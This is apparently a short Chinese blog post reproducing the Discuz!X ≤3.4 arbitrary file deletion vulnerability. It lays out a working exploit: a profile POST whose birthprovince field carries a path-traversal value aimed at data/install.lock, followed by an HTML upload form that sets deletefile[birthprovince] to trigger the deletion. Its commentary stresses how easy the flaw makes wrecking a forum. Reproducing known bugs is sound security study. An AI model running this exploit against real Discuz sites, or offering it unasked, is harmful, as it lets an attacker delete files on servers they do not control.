前言：
复现下Discuz!X 任意文件删除漏洞

目录：
0x01：漏洞描述
0x02：影响版本
0x03：如何利用

漏洞描述：

Discuz!X社区软件，是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台

2017年9月29日，Discuz！修复了一个安全问题用于加强安全性，这个漏洞导致前台用户可以任意删除文件

影响产品：

Discuz!X ≤3.4

如何利用：

• 修改出生地

POST：birthprovince=../../../data/install.lock&profilesubmit=1&formhash=5a608602

URL：http://localhost:81/Discuz3.3/home.php?mod=spacecp&oc=profile&op=base

• 上传任一图片

<form  action="http://localhost:81/Discuz3.3/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">  
<input type="file" name="birthprovince" id="file" />  
<input type="text" name="formhash" value="5a608602"/></p>  
<input type="text" name="profilesubmit" value="1"/></p>  
<input type="submit" value="Submit" />  
</from>

浅谈：

1：影响很大，在这个大家都不重视安全的环境里，等同于ODAY。

2：任意文件删除，如果别人要对一个Discuz社区做破坏的话，利用这个漏洞就十分简单

3：但无法重装，虽然可以删除install.lock，但是discuz在安装后，会删除install的index.php，所以无法重装。

成果图

参考地址：https://paper.seebug.org/411/